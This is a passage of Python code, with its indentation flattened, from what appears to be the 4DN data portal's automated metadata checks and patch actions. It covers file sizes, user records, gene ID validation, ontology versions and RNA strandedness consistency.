cnt=len(problem_files), type=type_str, st=status_str, ff=ff_str)
check.action_message = "Will attempt to patch file_size for %s files." % str(len(problem_files))
check.allow_action = True # allows the action to be run
return check
@action_function()
def patch_file_size(connection, **kwargs):
action = ActionResult(connection, 'patch_file_size')
action_logs = {'s3_file_not_found': [], 'patch_failure': [], 'patch_success': []}
# get the associated identify_files_without_filesize run result
filesize_check_result = action.get_associated_check_result(kwargs)
for hit in filesize_check_result.get('full_output', []):
bucket = connection.ff_s3.outfile_bucket if 'FileProcessed' in hit['@type'] else connection.ff_s3.raw_file_bucket
head_info = connection.ff_s3.does_key_exist(hit['upload_key'], bucket)
if not head_info:
action_logs['s3_file_not_found'].append(hit['accession'])
else:
patch_data = {'file_size': head_info['ContentLength']}
try:
ff_utils.patch_metadata(patch_data, obj_id=hit['uuid'], key=connection.ff_keys)
except Exception as e:
acc_and_error = '\n'.join([hit['accession'], str(e)])
action_logs['patch_failure'].append(acc_and_error)
else:
action_logs['patch_success'].append(hit['accession'])
action.status = 'DONE'
action.output = action_logs
return action
@check_function(reset=False)
def new_or_updated_items(connection, **kwargs):
''' Currently restricted to experiment sets and experiments
search query can be modified if desired
keeps a running total of number of new/changed items from
when the last time the 'reset' action was run
'''
class DictQuery(dict):
def get(self, path, default=None):
keys = path.split(".")
val = None
for key in keys:
if val:
if isinstance(val, list):
val = [v.get(key, default) if v else None for v in val]
else:
val = val.get(key, default)
else:
val = dict.get(self, key, default)
if not val:
break
return val
seen = {}
dcic = {}
def get_non_dcic_user(user, seen, dcic):
dciclab = "4DN DCIC, HMS"
try:
user = user.get('uuid')
except AttributeError:
pass
if user in dcic:
return None
if user in seen and user not in dcic:
return seen.get(user)
user_item = ff_utils.get_metadata(user, key=connection.ff_keys)
seen[user] = user_item.get('display_title')
if user_item.get('lab').get('display_title') == dciclab:
dcic[user] = True
return None
return user_item.get('display_title')
check = CheckResult(connection, 'new_or_updated_items')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
rundate = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M')
last_result = check.get_latest_result()
if last_result is None or last_result.get('status') == 'ERROR' or kwargs.get('reset') is True:
# initial set up when run on each environment - should produce 0 counts
# maybe also use for reset?
check.brief_output = {'reset_date': rundate}
check.full_output = {'reset_date': rundate}
check.status = 'PASS'
check.summary = 'Counters reset to 0'
return check
days_since = 7
last_check_date = last_result.get('uuid')
last_reset_date = last_result.get('brief_output').get('reset_date')
check.brief_output = {'reset_date': last_reset_date}
check.full_output = {'reset_date': last_reset_date}
days_ago = (datetime.datetime.utcnow() - datetime.timedelta(days=days_since)).strftime('%Y-%m-%dT%H:%M')
label2date = {
'since last check': last_check_date,
'since last reset': last_reset_date,
'in the last %d days' % days_since: days_ago
}
earliest_date = min([last_check_date, last_reset_date, days_ago])
search = 'search/?status=in review by lab&type={type}'
brief_output = {}
full_output = {}
warn = False
# fields used for reporting
item_flds = ['accession', 'lab.uuid', 'lab.display_title', 'submitted_by.uuid',
'last_modified.modified_by.uuid']
# can add or remove item types here
types2chk = ['ExperimentSet', 'Experiment']
for itype in types2chk:
chk_query = search.format(type=itype)
item_results = ff_utils.search_metadata(chk_query, key=connection.ff_keys, page_limit=200)
for item in item_results:
submitter = None
modifier = None
created = item.get('date_created')
modified = None
if item.get('last_modified', None) is not None:
modified = item.get('last_modified').get('date_modified')
# check to see if modified and created are essentially the same and if so ignore modified
minute_created = ':'.join(created.split(':')[0:2])
minute_modified = ':'.join(modified.split(':')[0:2])
if minute_created == minute_modified:
modified = None
if created and created > earliest_date:
submitter = get_non_dcic_user(item.get('submitted_by'), seen, dcic)
if modified and modified > earliest_date:
modifier = get_non_dcic_user(item.get('last_modified').get('modified_by'), seen, dcic)
# now we're ready to see which bucket item goes into
if submitter or modifier:
# we've got an item newer or modified since earliest date
item_info = {fld: DictQuery(item).get(fld) for fld in item_flds}
labname = item_info.get('lab.display_title')
labuuid = item_info.get('lab.uuid')
if submitter:
brief_output.setdefault(submitter, {}).setdefault(labname, {}).setdefault(itype, {})
full_output.setdefault(submitter, {}).setdefault(labname, {}).setdefault(itype, {})
for label, date in label2date.items():
newlabel = 'New ' + label
brief_output[submitter][labname][itype].setdefault(newlabel, 0)
full_output[submitter][labname][itype].setdefault(newlabel, 'None')
if created > date:
warn = True
# newlabel = 'New ' + label
# brief_output[submitter][labname][itype].setdefault(newlabel, 0)
brief_output[submitter][labname][itype][newlabel] += 1
# full_output[submitter][labname][itype].setdefault(newlabel, {'search': '', 'accessions': []})
if full_output[submitter][labname][itype][newlabel] == 'None' or not full_output[submitter][labname][itype][newlabel].get('search'):
searchdate, _ = date.split('T')
newsearch = '{server}/search/?q=date_created:[{date} TO *]&type={itype}&lab.uuid={lab}&submitted_by.uuid={sub}&status=in review by lab'.format(
server=connection.ff_server, date=searchdate, itype=itype, lab=labuuid, sub=item_info.get('submitted_by.uuid')
)
full_output[submitter][labname][itype][newlabel] = {'search': newsearch}
full_output[submitter][labname][itype][newlabel].setdefault('accessions', []).append(item_info['accession'])
if modifier:
brief_output.setdefault(modifier, {}).setdefault(labname, {}).setdefault(itype, {})
full_output.setdefault(modifier, {}).setdefault(labname, {}).setdefault(itype, {})
for label, date in label2date.items():
modlabel = 'Modified ' + label
brief_output[modifier][labname][itype].setdefault(modlabel, 0)
full_output[modifier][labname][itype].setdefault(modlabel, 'None')
if modified > date:
warn = True
# modlabel = 'Modified ' + label
# brief_output[modifier][labname][itype].setdefault(modlabel, 0)
brief_output[modifier][labname][itype][modlabel] += 1
# full_output[modifier][labname][itype].setdefault(modlabel, {'search': '', 'accessions': []})
if full_output[modifier][labname][itype][modlabel] == 'None' or not full_output[modifier][labname][itype][modlabel].get('search'):
searchdate, _ = date.split('T')
modsearch = ('{server}search/?q=last_modified.date_modified:[{date} TO *]'
'&type={itype}&lab.uuid={lab}&last_modified.modified_by.uuid={mod}status=in review by lab').format(
server=connection.ff_server, date=searchdate, itype=itype, lab=labuuid, mod=item_info.get('last_modified.modified_by.uuid')
)
full_output[modifier][labname][itype][modlabel] = {'search': modsearch}
full_output[modifier][labname][itype][modlabel].setdefault('accessions', []).append(item_info['accession'])
check.brief_output.update(brief_output)
check.full_output.update(full_output)
if warn is True:
check.status = 'WARN'
check.summary = 'In review Experiments or ExperimentSets submitted or modified'
description = "Experiments or ExperimentSets with status='in review by lab' have been submitted or modified by non-DCIC users since last reset or in the past %d days." % days_since
check.description = description
else:
check.status = 'PASS'
check.summary = 'No newly submitted or modified Experiments or ExperimentSets since last reset'
return check
@check_function()
def clean_up_webdev_wfrs(connection, **kwargs):
def patch_wfr_and_log(wfr, full_output):
uuid = wfr['uuid']
patch_json = {'uuid': uuid, 'status': 'deleted'}
# no need to patch again
if uuid in full_output['success']:
return
try:
ff_utils.patch_metadata(patch_json, uuid, key=connection.ff_keys)
except Exception as exc:
# log something about str(exc)
full_output['failure'].append('%s. %s' % (uuid, str(exc)))
else:
# successful patch
full_output['success'].append(uuid)
check = CheckResult(connection, 'clean_up_webdev_wfrs')
check.full_output = {'success': [], 'failure': []}
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# input for test pseudo hi-c-processing-bam
response = ff_utils.get_metadata('68f38e45-8c66-41e2-99ab-b0b2fcd20d45',
key=connection.ff_keys)
wfrlist = response['workflow_run_inputs']
for entry in wfrlist:
patch_wfr_and_log(entry, check.full_output)
wfrlist = response['workflow_run_outputs']
for entry in wfrlist:
patch_wfr_and_log(entry, check.full_output)
# input for test md5 and bwa-mem
response = ff_utils.get_metadata('f4864029-a8ad-4bb8-93e7-5108f462ccaa',
key=connection.ff_keys)
wfrlist = response['workflow_run_inputs']
for entry in wfrlist:
patch_wfr_and_log(entry, check.full_output)
# input for test md5 and bwa-mem
response = ff_utils.get_metadata('f4864029-a8ad-4bb8-93e7-5108f462ccaa',
key=connection.ff_keys)
wfrlist = response['workflow_run_inputs']
for entry in wfrlist:
patch_wfr_and_log(entry, check.full_output)
if check.full_output['failure']:
check.status = 'WARN'
check.summary = 'One or more WFR patches failed'
else:
check.status = 'PASS'
if check.full_output['success']:
check.summary = 'All WFR patches successful'
else:
check.summary = 'No WFR patches run'
return check
@check_function()
def validate_entrez_geneids(connection, **kwargs):
''' query ncbi to see if geneids are valid
'''
check = CheckResult(connection, 'validate_entrez_geneids')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
problems = {}
timeouts = 0
search_query = 'search/?type=Gene&limit=all&field=geneid'
genes = ff_utils.search_metadata(search_query, key=connection.ff_keys)
if not genes:
check.status = "FAIL"
check.description = "Could not retrieve gene records from fourfront"
return check
geneids = [g.get('geneid') for g in genes]
query = "https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=gene&id={id}"
for gid in geneids:
if timeouts > 5:
check.status = "FAIL"
check.description = "Too many ncbi timeouts. Maybe they're down."
return check
gquery = query.format(id=gid)
# make 3 attempts to query gene at ncbi
for count in range(3):
resp = requests.get(gquery)
if resp.status_code == 200:
break
if resp.status_code == 429:
time.sleep(0.334)
continue
if count == 2:
timeouts += 1
problems[gid] = 'ncbi timeout'
try:
rtxt = resp.text
except AttributeError:
problems[gid] = 'empty response'
else:
if rtxt.startswith('Error'):
problems[gid] = 'not a valid geneid'
if problems:
check.summary = "{} problematic entrez gene ids.".format(len(problems))
check.brief_output = problems
check.description = "Problematic Gene IDs found"
check.status = "WARN"
else:
check.status = "PASS"
check.description = "GENE IDs are all valid"
return check
@check_function(scope='all')
def users_with_pending_lab(connection, **kwargs):
"""Define comma seperated emails in scope
if you want to work on a subset of all the results"""
check = CheckResult(connection, 'users_with_pending_lab')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
check.action = 'finalize_user_pending_labs'
check.full_output = []
check.status = 'PASS'
cached_items = {} # store labs/PIs for performance
mismatch_users = []
# do not look for deleted/replaced users
scope = kwargs.get('scope')
search_q = '/search/?type=User&pending_lab!=No+value&frame=object'
# want to see all results or a subset defined by the scope
if scope == 'all':
pass
else:
emails = [mail.strip() for mail in scope.split(',')]
for an_email in emails:
search_q += '&email=' + an_email
search_res = ff_utils.search_metadata(search_q, key=connection.ff_keys)
for res in search_res:
user_fields = ['uuid', 'email', 'pending_lab', 'lab', 'title', 'job_title']
user_append = {k: res.get(k) for k in user_fields}
check.full_output.append(user_append)
# Fail if we have a pending lab and lab that do not match
if user_append['lab'] and user_append['pending_lab'] != user_append['lab']:
check.status = 'FAIL'
mismatch_users.append(user_append['uuid'])
continue
# cache the lab and PI contact info
if user_append['pending_lab'] not in cached_items:
to_cache = {}
pending_meta = ff_utils.get_metadata(user_append['pending_lab'], key=connection.ff_keys,
add_on='frame=object')
to_cache['lab_title'] = pending_meta['display_title']
if 'pi' in pending_meta:
pi_meta = ff_utils.get_metadata(pending_meta['pi'], key=connection.ff_keys,
add_on='frame=object')
to_cache['lab_PI_email'] = pi_meta['email']
to_cache['lab_PI_title'] = pi_meta['title']
to_cache['lab_PI_viewing_groups'] = pi_meta['viewing_groups']
cached_items[user_append['pending_lab']] = to_cache
# now use the cache to fill fields
for lab_field in ['lab_title', 'lab_PI_email', 'lab_PI_title', 'lab_PI_viewing_groups']:
user_append[lab_field] = cached_items[user_append['pending_lab']].get(lab_field)
if check.full_output:
check.summary = 'Users found with pending_lab.'
if check.status == 'PASS':
check.status = 'WARN'
check.description = check.summary + ' Run the action to add lab and remove pending_lab'
check.allow_action = True
check.action_message = 'Will attempt to patch lab and remove pending_lab for %s users' % len(check.full_output)
if check.status == 'FAIL':
check.summary += '. Mismatches found for pending_lab and existing lab'
check.description = check.summary + '. Resolve conflicts for mismatching users before running action. See brief_output'
check.brief_output = mismatch_users
else:
check.summary = 'No users found with pending_lab'
return check
@action_function()
def finalize_user_pending_labs(connection, **kwargs):
action = ActionResult(connection, 'finalize_user_pending_labs')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_failure': [], 'patch_success': []}
for user in check_res.get('full_output', []):
patch_data = {'lab': user['pending_lab']}
if user.get('lab_PI_viewing_groups'):
patch_data['viewing_groups'] = user['lab_PI_viewing_groups']
# patch lab and delete pending_lab in one request
try:
ff_utils.patch_metadata(patch_data, obj_id=user['uuid'], key=connection.ff_keys,
add_on='delete_fields=pending_lab')
except Exception as e:
action_logs['patch_failure'].append({user['uuid']: str(e)})
else:
action_logs['patch_success'].append(user['uuid'])
action.status = 'DONE'
action.output = action_logs
return action
def get_tokens_to_string(s):
""" divides a (potentially) multi-word string into tokens - splitting on whitespace or hyphens
(important for hyphenated names) and lower casing
returns a single joined string of tokens
"""
tokens = [t.lower() for t in re.split(r'[\s-]', s) if t]
return ''.join(tokens)
def string_label_similarity(string1, string2):
""" compares concantenate token strings for similarity
simple tokenization - return a score between
0-1
"""
s1cmp = get_tokens_to_string(string1)
s2cmp = get_tokens_to_string(string2)
return SequenceMatcher(None, s1cmp, s2cmp).ratio()
@check_function(emails=None, ignore_current=False, reset_ignore=False)
def users_with_doppelganger(connection, **kwargs):
""" Find users that share emails or have very similar names
Args:
emails: comma seperated emails to run the check on, i.e. when you want to ignore some of the results
ignore_current: if there are accepted catches, put them to emails, and set ignore_current to true,
they will not show up next time.
if there are caught cases, which are not problematic, you can add them to ignore list
reset_ignore: you can reset the ignore list, and restart it, useful if you added something by mistake
Result:
full_output : contains two lists, one for problematic cases, and the other one for results to skip (ignore list)
"""
check = CheckResult(connection, 'users_with_doppelganger')
check.description = 'Reports duplicate users, and number of items they created (user1/user2)'
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# do we want to add current results to ignore list
ignore_current = False
if kwargs.get('ignore_current'):
ignore_current = True
# do we want to reset the ignore list
reset = False
if kwargs.get('reset_ignore'):
reset = True
# GET THE IGNORE LIST FROM LAST CHECKS IF NOT RESET_IGNORE
if reset:
ignored_cases = []
else:
last_result = check.get_primary_result()
# if last one was fail, find an earlier check with non-FAIL status
it = 0
while last_result['status'] == 'ERROR' or not last_result['kwargs'].get('primary'):
it += 1
# this is a daily check, so look for checks with 12h iteration
hours = it * 12
last_result = check.get_closest_result(diff_hours=hours)
# if this is going forever kill it
if hours > 100:
err_msg = 'Can not find a non-FAIL check in last 100 hours'
check.brief_output = err_msg
check.full_output = {}
check.status = 'ERROR'
return check
# remove cases previously ignored
ignored_cases = last_result['full_output'].get('ignore', [])
# ignore contains nested list with 2 elements, 2 user @id values that should be ignored
check.full_output = {'result': [], 'ignore': []}
check.brief_output = []
check.status = 'PASS'
query = ('/search/?type=User&sort=display_title'
'&field=display_title&field=contact_email&field=preferred_email&field=email')
# if check was limited to certain emails
if kwargs.get('emails'):
emails = kwargs['emails'].split(',')
for an_email in emails:
an_email = an_email.strip()
if an_email:
query += '&email=' + an_email.strip()
# get users
all_users = ff_utils.search_metadata(query, key=connection.ff_keys)
# combine all emails for each user
for a_user in all_users:
mail_fields = ['email', 'contact_email', 'preferred_email']
user_mails = []
for f in mail_fields:
if a_user.get(f):
user_mails.append(a_user[f].lower())
a_user['all_mails'] = list(set(user_mails))
# go through each combination
combs = itertools.combinations(all_users, 2)
cases = []
for comb in combs:
us1 = comb[0]
us2 = comb[1]
# is there a common email between the 2 users
common_mail = list(set(us1['all_mails']) & set(us2['all_mails']))
if common_mail:
msg = '{} and {} share mail(s) {}'.format(
us1['display_title'],
us2['display_title'],
str(common_mail))
log = {'user1': [us1['display_title'], us1['@id'], us1['email']],
'user2': [us2['display_title'], us2['@id'], us2['email']],
'log': 'has shared email(s) {}'.format(str(common_mail)),
'brief': msg}
cases.append(log)
# if not, compare names
else:
score = round(string_label_similarity(us1['display_title'], us2['display_title']) * 100)
if score > 85:
msg = '{} and {} are similar-{}'.format(
us1['display_title'],
us2['display_title'],
str(score))
log = {'user1': [us1['display_title'], us1['@id'], us1['email']],
'user2': [us2['display_title'], us2['@id'], us2['email']],
'log': 'has similar names ({}/100)'.format(str(score)),
'brief': msg}
cases.append(log)
# are the ignored ones getting out of control
if len(ignored_cases) > 100:
fail_msg = 'Number of ignored cases is very high, time for maintainace'
check.brief_output = fail_msg
check.full_output = {'result': [fail_msg, ], 'ignore': ignored_cases}
check.status = 'FAIL'
return check
# remove ignored cases from all cases
if ignored_cases:
for an_ignored_case in ignored_cases:
cases = [i for i in cases if i['user1'] not in an_ignored_case and i['user2'] not in an_ignored_case]
# if ignore_current, add cases to ignored ones
if ignore_current:
for a_case in cases:
ignored_cases.append([a_case['user1'], a_case['user2']])
cases = []
# add if they have any items referencing them
if cases:
for a_case in cases:
us1_info = ff_utils.get_metadata('indexing-info?uuid=' + a_case['user1'][1][7:-1], key=connection.ff_keys)
item_count_1 = len(us1_info['uuids_invalidated'])
us2_info = ff_utils.get_metadata('indexing-info?uuid=' + a_case['user2'][1][7:-1], key=connection.ff_keys)
item_count_2 = len(us2_info['uuids_invalidated'])
add_on = ' ({}/{})'.format(item_count_1, item_count_2)
a_case['log'] = a_case['log'] + add_on
a_case['brief'] = a_case['brief'] + add_on
check.full_output = {'result': cases, 'ignore': ignored_cases}
if cases:
check.summary = 'Some user accounts need attention.'
check.brief_output = [i['brief'] for i in cases]
check.status = 'WARN'
else:
check.summary = 'No user account conflicts'
check.brief_output = []
return check
@check_function()
def check_assay_classification_short_names(connection, **kwargs):
check = CheckResult(connection, 'check_assay_classification_short_names')
check.action = 'patch_assay_subclass_short'
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
subclass_dict = {
"replication timing": "Replication timing",
"proximity to cellular component": "Proximity-seq",
"dna binding": "DNA binding",
"open chromatin": "Open Chromatin",
"open chromatin - single cell": "Open Chromatin",
"dna-dna pairwise interactions": "Hi-C",
"dna-dna pairwise interactions - single cell": "Hi-C (single cell)",
"dna-dna multi-way interactions": "Hi-C (multi-contact)",
"dna-dna multi-way interactions of selected loci": "3/4/5-C (multi-contact)",
"dna-dna pairwise interactions of enriched regions": "IP-based 3C",
"dna-dna pairwise interactions of selected loci": "3/4/5-C",
"ligation-free 3c": "Ligation-free 3C",
"transcription": "Transcription",
"transcription - single cell": "Transcription",
"rna-dna pairwise interactions": "RNA-DNA HiC",
"fixed sample dna localization": "DNA FISH",
"chromatin tracing": "DNA FISH",
"fixed sample rna localization": "RNA FISH",
"single particle tracking": "SPT",
"context-dependent reporter expression": "Reporter Expression",
"scanning electron microscopy": "SEM",
"transmission electron microscopy": "TEM",
"immunofluorescence": "Immunofluorescence",
"synthetic condensation": "OptoDroplet",
"capture hi-c": "Enrichment Hi-C"
}
exptypes = ff_utils.search_metadata('search/?type=ExperimentType&frame=object',
key=connection.ff_keys)
auto_patch = {}
manual = {}
for exptype in exptypes:
value = ''
if exptype.get('assay_classification', '').lower() in subclass_dict:
value = subclass_dict[exptype['assay_classification'].lower()]
elif exptype.get('title', '').lower() in subclass_dict:
value = subclass_dict[exptype['title'].lower()]
elif exptype.get('assay_subclassification', '').lower() in subclass_dict:
value = subclass_dict[exptype['assay_subclassification'].lower()]
else:
manual[exptype['@id']] = {
'classification': exptype['assay_classification'],
'subclassification': exptype['assay_subclassification'],
'current subclass_short': exptype.get('assay_subclass_short'),
'new subclass_short': 'N/A - Attention needed'
}
if value and exptype.get('assay_subclass_short') != value:
auto_patch[exptype['@id']] = {
'classification': exptype['assay_classification'],
'subclassification': exptype['assay_subclassification'],
'current subclass_short': exptype.get('assay_subclass_short'),
'new subclass_short': value
}
check.allow_action = True
check.full_output = {'Manual patching needed': manual, 'Patch by action': auto_patch}
check.brief_output = {'Manual patching needed': list(manual.keys()), 'Patch by action': list(auto_patch.keys())}
if auto_patch or manual:
check.status = 'WARN'
check.summary = 'Experiment Type classifications need patching'
check.description = '{} experiment types need assay_subclass_short patched'.format(
len(manual.keys()) + len(auto_patch.keys())
)
if manual:
check.summary += ' - some manual patching needed'
else:
check.status = 'PASS'
check.summary = 'Experiment Type classifications all set'
check.description = 'No experiment types need assay_subclass_short patched'
return check
@action_function()
def patch_assay_subclass_short(connection, **kwargs):
action = ActionResult(connection, 'patch_assay_subclass_short')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_success': [], 'patch_failure': []}
for k, v in check_res['full_output']['Patch by action'].items():
try:
ff_utils.patch_metadata({'assay_subclass_short': v['new subclass_short']}, k, key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({k: str(e)})
else:
action_logs['patch_success'].append(k)
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
def semver2int(semver):
v = [num for num in semver.lstrip('v').split('.')]
for i in range(1, len(v)):
if len(v[i]) == 1:
v[i] = '0' + v[i]
return float(''.join([v[0] + '.'] + v[1:]))
@check_function()
def check_for_ontology_updates(connection, **kwargs):
'''
Checks for updates in one of the three main ontologies that the 4DN data portal uses:
EFO, UBERON, and OBI.
EFO: checks github repo for new releases and compares release tag. Release tag is a
semantic version number starting with 'v'.
OBI: checks github repo for new releases and compares release tag. Release tag is a 'v'
plus the release date.
UBERON: github site doesn't have official 'releases' (and website isn't properly updated),
so checks for commits that have a commit message containing 'new release'
If version numbers to compare against aren't specified in the UI, it will use the ones
from the previous primary check result.
'''
check = CheckResult(connection, 'check_for_ontology_updates')
check.summary = ''
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
ontologies = ff_utils.search_metadata(
'search/?type=Ontology&frame=object',
key=connection.ff_keys
)
ontologies = [o for o in ontologies if o['ontology_prefix'] != '4DN']
versions = {
o['ontology_prefix']: {
'current': o.get('current_ontology_version'),
'needs_update': False
} for o in ontologies
}
for o in ontologies:
owl = None
if o['ontology_prefix'] == 'UBERON':
# UBERON needs different URL for version info
owl = requests.get('http://purl.obolibrary.org/obo/uberon.owl', headers={"Range": "bytes=0-2000"})
elif o.get('download_url'):
# instead of repos etc, check download url for ontology header to get version
owl = requests.get(o['download_url'], headers={"Range": "bytes=0-2000"})
if not owl:
# there is an issue with the request beyond 404
versions[o['ontology_prefix']]['latest'] = 'WARN: no owl returned at request'
check.summary = 'Problem with ontology request - nothing returned'
check.description = 'One or more ontologies has nothing returned from attempted request.'
check.description += ' Please update ontology item or try again later.'
check.status = 'WARN'
continue
elif owl.status_code == 404:
versions[o['ontology_prefix']]['latest'] = 'WARN: 404 at download_url'
check.summary = 'Problem 404 at download_url'
check.description = 'One or more ontologies has a download_url with a 404 error.'
check.description += ' Please update ontology item or try again later.'
check.status = 'WARN'
continue
if 'versionIRI' in owl.text:
idx = owl.text.index('versionIRI')
vline = owl.text[idx:idx+150]
if 'releases'in vline:
vline = vline.split('/')
v = vline[vline.index('releases')+1]
versions[o['ontology_prefix']]['latest'] = v
continue
else:
# looks for date string in versionIRI line
match = re.search('(20)?([0-9]{2})-[0-9]{2}-(20)?[0-9]{2}', vline)
if match:
v = match.group()
versions[o['ontology_prefix']]['latest'] = v
continue
# SO removed version info from versionIRI, use date field instead
if 'oboInOwl:date' in owl.text:
idx = owl.text.index('>', owl.text.index('oboInOwl:date'))
vline = owl.text[idx+1:owl.text.index('<', idx)]
v = vline.split()[0]
versions[o['ontology_prefix']]['latest'] = datetime.datetime.strptime(v, '%d:%m:%Y').strftime('%Y-%m-%d')
check.brief_output = []
for k, v in versions.items():
if v.get('latest') and '404' in v['latest']:
check.brief_output.append('{} - 404'.format(k))
elif not v['current']:
v['needs_update'] = True
check.brief_output.append('{} needs update'.format(k))
elif k == 'EFO' and semver2int(v['latest']) > semver2int(v['current']):
v['needs_update'] = True
check.brief_output.append('{} needs update'.format(k))
elif k != 'EFO' and v['latest'] > v['current']:
v['needs_update'] = True
check.brief_output.append('{} needs update'.format(k))
else:
check.brief_output.append('{} OK'.format(k))
check.full_output = versions
num = ''.join(check.brief_output).count('update')
if 'Problem' not in check.summary:
if num:
check.summary = 'Ontology updates available'
check.description = '{} ontologies need update'.format(num)
check.status = 'WARN'
else:
check.summary = 'Ontologies up-to-date'
check.description = 'No ontology updates needed'
check.status = 'PASS'
if num == 1 & versions['SO']['needs_update']:
check.status = 'PASS'
return check
@check_function()
def states_files_without_higlass_defaults(connection, **kwargs):
check = CheckResult(connection, 'states_files_without_higlass_defaults')
check.action = 'patch_states_files_higlass_defaults'
check.full_output = {'to_add': {}, 'problematic_files': {}}
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
query = '/search/?file_type=chromatin states&type=File'
res = ff_utils.search_metadata(query, key=connection.ff_keys)
for a_res in res:
if not a_res.get('higlass_defaults'):
if not a_res.get('tags'):
check.full_output['problematic_files'][a_res['accession']] = 'missing state tag'
else:
check.full_output['to_add'][a_res['accession']] = a_res["tags"]
if check.full_output['to_add']:
check.status = 'WARN'
check.summary = 'Ready to patch higlass_defaults'
check.description = 'Ready to patch higlass_defaults'
check.allow_action = True
check.action_message = 'Will patch higlass_defaults to %s items' % (len(check.full_output['to_add']))
elif check.full_output['problematic_files']:
check.status = 'WARN'
check.summary = 'There are some files without states tags'
else:
check.status = 'PASS'
check.summary = 'higlass_defaults are all set'
return check
@action_function()
def patch_states_files_higlass_defaults(connection, **kwargs):
action = ActionResult(connection, 'patch_states_files_higlass_defaults')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_success': [], 'patch_failure': [], 'missing_ref_file': []}
total_patches = check_res['full_output']['to_add']
s3 = boto3.resource('s3')
bucket = s3.Bucket('elasticbeanstalk-%s-files' % prod_bucket_env_for_app())
query = '/search/?type=FileReference'
all_ref_files = ff_utils.search_metadata(query, key=connection.ff_keys)
ref_files_tags = {}
for ref_file in all_ref_files:
if ref_file.get('tags'):
for ref_file_tag in ref_file.get('tags'):
if 'states' in ref_file_tag:
ref_files_tags[ref_file_tag] = {'uuid': ref_file['uuid'], 'accession': ref_file['accession']}
for item, tag in total_patches.items():
if ref_files_tags.get(tag[0]):
buck_obj = ref_files_tags[tag[0]]['uuid'] + '/' + ref_files_tags[tag[0]]['accession'] + '.txt'
obj = bucket.Object(buck_obj)
body = obj.get()['Body'].read().decode('utf8')
lines = body.split()
states_colors = [item for num, item in enumerate(lines) if num % 2 != 0]
patch = {'higlass_defaults': {'colorScale': states_colors}}
try:
ff_utils.patch_metadata(patch, item, key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({item: str(e)})
else:
action_logs['patch_success'].append(item)
else:
action_logs['missing_ref_file'].append({item: 'missing rows_info reference file'})
if action_logs['patch_failure'] or action_logs['missing_ref_file']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def check_for_strandedness_consistency(connection, **kwargs):
check = CheckResult(connection, 'check_for_strandedness_consistency')
check.action = 'patch_strandedness_consistency_info'
check.full_output = {'to_patch': {}, 'problematic': {}}
check.brief_output = []
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# Build the query (RNA-seq experiments for now)
query = '/search/?experiment_type.display_title=RNA-seq&type=ExperimentSeq'
# The search
res = ff_utils.search_metadata(query, key=connection.ff_keys)
# experiments that need to be patched
missing_consistent_tag = []
problematic = {'fastqs_zero_count_both_strands': [], 'fastqs_unmatch_strandedness': [], 'inconsistent_strandedness': []}
target_experiments = [] # the experiments that we are interested in (fastqs with beta actin count tag)
# Filtering the experiments target experiments
for a_res in res:
if a_res.get("strandedness"):
strandedness_meta = a_res['strandedness']
else:
strandedness_meta = 'missing'
exp_info = {'meta': a_res, 'files': [], 'tag': strandedness_meta}
# verify that the files in the experiment have the beta-actin count info
for a_re_file in a_res['files']:
if a_re_file['file_format']['display_title'] == 'fastq':
file_meta = ff_utils.get_metadata(a_re_file['accession'], connection.ff_keys)
file_meta_keys = file_meta.keys()
if 'beta_actin_sense_count' in file_meta_keys and 'beta_actin_antisense_count' in file_meta_keys:
ready = True
if file_meta.get('related_files'):
paired = True
else:
paired = False
file_info = {'accession': file_meta['accession'],
'sense_count': file_meta['beta_actin_sense_count'],
'antisense_count': file_meta['beta_actin_antisense_count'],
'paired': paired}
exp_info['files'].append(file_info)
else:
ready = False
if ready:
target_experiments.append(exp_info)
# Calculates if the beta-actin count is consistent with the metadata strandedness asignment.
if target_experiments:
problm = False
for target_exp in target_experiments:
if target_exp['meta'].get('tags'):
tags = target_exp['meta']['tags']
else:
tags = []
if 'strandedness_verified' not in tags:
# Calculate forward, reversed or unstranded
strandedness_report = wrangler_utils.calculate_rna_strandedness(target_exp['files'])
if "unknown" in strandedness_report['calculated_strandedness']:
problematic['fastqs_unmatch_strandedness'].append({'exp': target_exp['meta']['accession'],
'strandedness_info': strandedness_report})
problm = True
elif strandedness_report['calculated_strandedness'] == "zero":
problematic['fastqs_zero_count_both_strands'].append({'exp': target_exp['meta']['accession'],
'strandedness_info': strandedness_report})
problm = True
elif target_exp['tag'] != strandedness_report['calculated_strandedness']:
problematic['inconsistent_strandedness'].append({'exp': target_exp['meta']['accession'],
'strandedness_metadata': target_exp['tag'],
'calculated_strandedness': strandedness_report['calculated_strandedness'],
'files': strandedness_report['files']})
problm = True
else:
missing_consistent_tag.append(target_exp['meta']['accession'])
problm = True
if problm:
check.status = 'WARN'
check.description = 'Problematic experiments need to be addressed'
msg = str(len(missing_consistent_tag) + len(problematic['fastqs_unmatch_strandedness']) + len(problematic['fastqs_zero_count_both_strands']) +
len(problematic['inconsistent_strandedness'])) + ' experiment(s) need to be addressed'
check.brief_output.append(msg)
if problematic['fastqs_zero_count_both_strands']:
check.full_output['problematic']['fastqs_zero_count_both_strands'] = problematic['fastqs_zero_count_both_strands']
if problematic['fastqs_unmatch_strandedness']:
check.full_output['problematic']['fastqs_unmatch_strandedness'] = problematic['fastqs_unmatch_strandedness']
if problematic['inconsistent_strandedness']:
